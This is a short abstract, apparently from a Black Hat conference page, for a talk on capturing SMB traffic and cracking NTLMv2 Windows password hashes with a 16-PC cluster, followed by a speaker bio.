NTLMv2 is one of the Microsoft Windows authentication mechanisms used when users attempt to log into a remote system through network connections. It uses the challenge/response model in order to avoid sending passwords onto the network in plain text. The previous versions of authentication mechanisms, "LM and NTLM version 1", have been known vulnerable. So, Microsoft introduces NTLM version 2 and claims that it "significantly improves" the authentication mechanisms.

In this presentation, I will start with a brief introduction to LM authentication mechanism. Then I will discuss the encryption algorithm used by NTLM version 2. Finally I will focus on how to capture SMB traffic and how to extract requisite authentication data needed to crack NTLMv2. This presentation will let you realize that the security of your system really depends on the complexity of your password but not the "improved" algorithm of NTLMv2.

We have developed a system to crack NTLMv2 encrypted password using a clustered system of 16 PC's. At the end of this presentation, I will give a demonstration based on this system.

Hidenobu Seki, aka Urity, works as a network security specialist at He has a deep interest in the authentication system of MS Windows. SecurityFriday performs researches on local computer network security. SecurityFriday's members are very knowledgeable in the areas of network security in the Ethernet layer and in the Windows SMB network.

[ Their Presentation! ] [ See It! ] [ Hear It! ]

Return to the top of the page

(c) 1996-2002 Black Hat, Inc